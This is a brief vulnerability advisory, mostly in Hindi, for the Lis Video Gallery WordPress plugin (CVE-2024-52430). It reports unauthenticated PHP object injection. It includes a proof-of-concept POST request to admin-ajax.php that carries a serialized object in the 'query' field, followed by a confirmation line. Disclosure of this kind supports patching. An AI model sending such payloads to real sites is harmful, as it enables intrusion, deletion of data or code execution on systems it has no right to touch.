
Lis Video Gallery <= 0.2.1 - अप्रमाणित PHP Object Injection
Lis Video Gallery <= 0.2.1 - अप्रमाणित PHP वस्तु अंतःक्षेपण
WordPress के लिए Lis Video Gallery प्लगइन संस्करण 0.2.1 तक (सम्मिलित) अविश्वसनीय इनपुट के विसीरियलाइज़ेशन के माध्यम से PHP वस्तु अंतःक्षेपण के लिए संवेदनशील है। इससे अप्रमाणित हमलावरों के लिए PHP वस्तु इंजेक्ट करना संभव हो जाता है। कमजोर सॉफ्टवेयर में कोई ज्ञात POP श्रृंखला मौजूद नहीं है। यदि लक्ष्य सिस्टम पर स्थापित किसी अतिरिक्त प्लगइन या थीम के माध्यम से POP श्रृंखला मौजूद है, तो यह हमलावर को मनमानी फ़ाइलों को हटाने, संवेदनशील डेटा प्राप्त करने, या कोड निष्पादित करने की अनुमति दे सकता है।
CVE: CVE-2024-52430
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: lis-video-gallery
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
action=loadmore&query=O%3a20%3a%22PHP_Object_Injection%22%3a0%3a%7b%7d&page=1
PHP object injection has occurred.